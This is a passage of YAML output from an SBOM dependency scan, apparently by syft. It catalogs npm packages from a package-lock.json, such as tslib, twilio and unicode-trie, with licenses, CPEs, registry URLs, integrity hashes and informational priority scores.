version: 0.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:tr46:tr46:0.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/tr46@0.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz
|
|
integrity: sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 975e90d4d26bc8ab
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ts-interface-checker 0.1.13'
|
|
title: ts-interface-checker 0.1.13
|
|
description: 'Package discovered: ts-interface-checker 0.1.13'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4b85ef460bf1550e
|
|
name: ts-interface-checker
|
|
version: 0.1.13
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ts-interface-checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ts-interface-checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ts_interface_checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ts_interface_checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ts-interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ts-interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ts_interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ts_interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ts:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ts:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/ts-interface-checker@0.1.13
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ts-interface-checker/-/ts-interface-checker-0.1.13.tgz
|
|
integrity: sha512-Y/arvbn+rrz3JCKl9C4kVNfTfSm2/mEp5FSz5EsZSANGPSlQrpRI5M4PKF+mJnE52jOO90PnPSc3Ur3bTQw0gA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ef69db02aad9ddba
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: tslib 2.4.1'
|
|
title: tslib 2.4.1
|
|
description: 'Package discovered: tslib 2.4.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a41a6d4fcfaa1c57
|
|
name: tslib
|
|
version: 2.4.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: 0BSD
|
|
spdxExpression: 0BSD
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:tslib:tslib:2.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/tslib@2.4.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz
|
|
integrity: sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 15d8d07e284b7f66
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: tslib 2.8.1'
|
|
title: tslib 2.8.1
|
|
description: 'Package discovered: tslib 2.8.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 732c6f5be784c8f2
|
|
name: tslib
|
|
version: 2.8.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: 0BSD
|
|
spdxExpression: 0BSD
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:tslib:tslib:2.8.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/tslib@2.8.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz
|
|
integrity: sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d407f6f6881f51f1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: twilio 5.13.1'
|
|
title: twilio 5.13.1
|
|
description: 'Package discovered: twilio 5.13.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b26b672319df2e47
|
|
name: twilio
|
|
version: 5.13.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:twilio:twilio:5.13.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/twilio@5.13.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/twilio/-/twilio-5.13.1.tgz
|
|
integrity: sha512-sT+PkhptF4Mf7t8eXFFvPQx4w5VHnBIPXbltGPMFRe+R2GxfRdMuFbuNA/cEm0aQR6LFQOn33+fhClg+TjRVqQ==
|
|
dependencies:
|
|
axios: ^1.13.5
|
|
dayjs: ^1.11.9
|
|
https-proxy-agent: ^5.0.0
|
|
jsonwebtoken: ^9.0.3
|
|
qs: ^6.14.1
|
|
scmp: ^2.1.0
|
|
xmlbuilder: ^13.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1b446cdccc9a93b0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: type-is 1.6.18'
|
|
title: type-is 1.6.18
|
|
description: 'Package discovered: type-is 1.6.18'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a8ca97010550105a
|
|
name: type-is
|
|
version: 1.6.18
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:type-is:type-is:1.6.18:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:type-is:type_is:1.6.18:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:type_is:type-is:1.6.18:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:type_is:type_is:1.6.18:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:type:type-is:1.6.18:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:type:type_is:1.6.18:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/type-is@1.6.18
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz
|
|
integrity: sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==
|
|
dependencies:
|
|
media-typer: 0.3.0
|
|
mime-types: ~2.1.24
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a01b70906be81bf9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: typedarray 0.0.6'
|
|
title: typedarray 0.0.6
|
|
description: 'Package discovered: typedarray 0.0.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e635ba578a775ab5
|
|
name: typedarray
|
|
version: 0.0.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:typedarray:typedarray:0.0.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/typedarray@0.0.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz
|
|
integrity: sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 730b4341f8da3a62
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: undici-types 6.21.0'
|
|
title: undici-types 6.21.0
|
|
description: 'Package discovered: undici-types 6.21.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9968e425c772df9f
|
|
name: undici-types
|
|
version: 6.21.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:undici-types:undici-types:6.21.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:undici-types:undici_types:6.21.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:undici_types:undici-types:6.21.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:undici_types:undici_types:6.21.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:undici:undici-types:6.21.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:undici:undici_types:6.21.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/undici-types@6.21.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz
|
|
integrity: sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a49eb5c706dbb178
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: unicode-properties 1.4.1'
|
|
title: unicode-properties 1.4.1
|
|
description: 'Package discovered: unicode-properties 1.4.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 541fbe3121e73dce
|
|
name: unicode-properties
|
|
version: 1.4.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:unicode-properties:unicode-properties:1.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode-properties:unicode_properties:1.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode_properties:unicode-properties:1.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode_properties:unicode_properties:1.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode:unicode-properties:1.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode:unicode_properties:1.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/unicode-properties@1.4.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/unicode-properties/-/unicode-properties-1.4.1.tgz
|
|
integrity: sha512-CLjCCLQ6UuMxWnbIylkisbRj31qxHPAurvena/0iwSVbQ2G1VY5/HjV0IRabOEbDHlzZlRdCrD4NhB0JtU40Pg==
|
|
dependencies:
|
|
base64-js: ^1.3.0
|
|
unicode-trie: ^2.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d33b9ca7e3f48cc1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: unicode-trie 2.0.0'
|
|
title: unicode-trie 2.0.0
|
|
description: 'Package discovered: unicode-trie 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: aac566dbf0b492ea
|
|
name: unicode-trie
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:unicode-trie:unicode-trie:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode-trie:unicode_trie:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode_trie:unicode-trie:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode_trie:unicode_trie:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode:unicode-trie:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:unicode:unicode_trie:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/unicode-trie@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/unicode-trie/-/unicode-trie-2.0.0.tgz
|
|
integrity: sha512-x7bc76x0bm4prf1VLg79uhAzKw8DVboClSN5VxJuQ+LKDOVEW9CdH+VY7SP+vX7xCYQqzzgQpFqz15zeLvAtZQ==
|
|
dependencies:
|
|
pako: ^0.2.5
|
|
tiny-inflate: ^1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4121fde58e5100ef
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: unpipe 1.0.0'
|
|
title: unpipe 1.0.0
|
|
description: 'Package discovered: unpipe 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 294cc6dab10e14ff
|
|
name: unpipe
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:unpipe:unpipe:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/unpipe@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz
|
|
integrity: sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0c87db67edbd6edf
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: update-browserslist-db 1.2.3'
|
|
title: update-browserslist-db 1.2.3
|
|
description: 'Package discovered: update-browserslist-db 1.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7776752fe1d43a3e
|
|
name: update-browserslist-db
|
|
version: 1.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:update-browserslist-db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:update-browserslist-db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:update_browserslist_db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:update_browserslist_db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:update-browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:update-browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:update_browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:update_browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:update:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:update:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/update-browserslist-db@1.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.2.3.tgz
|
|
integrity: sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==
|
|
dependencies:
|
|
escalade: ^3.2.0
|
|
picocolors: ^1.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
